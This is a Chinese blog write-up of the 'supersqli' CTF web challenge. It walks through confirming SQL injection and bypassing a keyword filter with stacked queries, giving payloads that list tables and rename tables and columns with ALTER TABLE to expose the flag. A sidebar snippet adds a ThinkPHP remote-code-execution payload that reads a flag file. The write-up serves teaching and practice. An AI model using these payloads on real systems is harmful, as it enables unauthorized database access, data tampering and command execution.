【攻防世界】——WEB高手进阶--supersqli

最新推荐文章于 2024-05-10 21:16:18 发布
最新推荐文章于 2024-05-10 21:16:18 发布
阅读量549 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43828818/article/details/106305735
版权

题目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。
在这里插入图片描述
在这里插入图片描述
order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。
在这里插入图片描述
尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以
1‘;show talbes–+
在这里插入图片描述
查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。
1’;show columns from 1919810931114514–+
1’;show columns from words–+
在这里插入图片描述
在这里插入图片描述
接着找到了一些骚姿势,通过将表1919810931114514改为words,flag列名改为id,这样就能除了flag
payload:1’; alter table words rename to words1;alter table 1919810931114514 rename to words;alter table words change flag id varchar(50);#
然后用1’ or ‘1’='1就可以拿到flag
在这里插入图片描述

c h e n�
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界-web高手进阶
zji
04-25 4923
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界——web高手进阶区(1~6)
weixin_52805837的博客
03-09 618
攻防世界——web高手进阶区(1~6) (1)baby_web: 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag (2)Training-WWW-Robots: 直接先访问robots.txt: 然后在url在输入/fl0g.php,得到flag (3)Web_python_template_injection: 首先构造/{
攻防世界(CTF)~web-supersqli(详细解题思路)
m0_75030189的博客
05-10 938
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
攻防世界——supersqli进阶
qq_62046696的博客
05-04 1546
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。 打开场景以后,发现的是一个文本框,然后试一下有没有sql注入 先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入 然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列 发现select被禁用 然后就想到运用推叠注入, 想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库 然后进行查表操作, ..
攻防世界web高手进阶supersqli——Amao~
qq_45995328的博客
09-11 158
攻防世界web高手进阶supersqli 1.判断是否存在注入: and 1=1 、and 1=2 都可以正常显示 排除整型注入 ’ 加上报错,存在字符型注入 2. 判断字段数: 1’ order by 1、2正常显示 3 – # 报错,字段数为2 3.判断显位: 1' select 1,2 不能用联合查询,使用堆叠注入 4.查看数据库 1'; show databases -- # -- 必须加; 因为原始的sql语句格式为 select 。。。 from 。。。 where inj
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6691
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
攻防世界题目练习——Web引导模式(二)
qq_48550824的博客
10-12 619
看源码可以知道,__wakeup()函数会强制将文件名转为index.php,因此我们需要绕过__wakeup()函数,接下来执行的__destruct()函数会输出对应文件的内容,我们需要让文件名显示为我们要查看的文件。的时候的结果,也就是说,这个网页在查询数据库时,应该是默认的查询的表名为"words",查询的列名为"id",所以我们把flag所在的表名改成words,列名改成id,就可以在网页查询1时获得flag。,1后面的单引号是多余的,因此触发报错,就可以判断我们输入的参数就是单引号闭合的形式。
XCTF 攻防世界 web 高手进阶
qq_44657899的博客
12-04 3057
command_execution 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目相关知识点: 一,windows系统有哪些命令行拼接符。 A&B 简单的拼接,A与B同时执行。 A&&B A执行成功,则执行B。 A|B A命令的输出作为B命令的输入执行。 A||B 若A命令执行失败,则执行B命令。 二,fi...
攻防世界web进阶题(二)
qq_51637038的博客
08-31 194
supersqli 看题目得知是SQL注入题 提交单引号报错,说明可能存在注入,单引号后加’--’,报错,说明网站已将其过滤,换#号,没报错,说明#注释符可用。 加语句‘order by 2#未报错 使用select时发现某些关键字被过滤,preg_match()函数作用为正则表达式匹配,’\.’中\为转义符,.在正则表达式中代表任一符号,转义后即代表本身。i代表匹配模式为大小写不敏感。 因此需要将所用关键字绕过,使用union注入时发现大小写、注释、不等号等绕过方式都不行,因此考虑到堆叠
攻防世界-Web合集-引导模式(持续更新)
qq_52364123的博客
12-27 1043
攻防世界-Web合集-引导模式(持续更新)
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
基于Python flask 的豆瓣电影top250数据评分可视化
最新发布
08-03
基于Python flask 的豆瓣电影top250数据评分可视化
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
08-03
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
MQTTX-Setup-1.9.9-x64.exe
08-03
主要是MQTT的软件安装包
攻防世界---Web---新手模式---backup
11-11
题目描述:在攻防世界Web新手模式中,有一道名为backup的题目。该题目要求找到备份文件并获取flag。可以通过访问http://your-ip/backup/来查看备份文件,但是需要密码才能访问。我们可以通过查看网页源代码或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值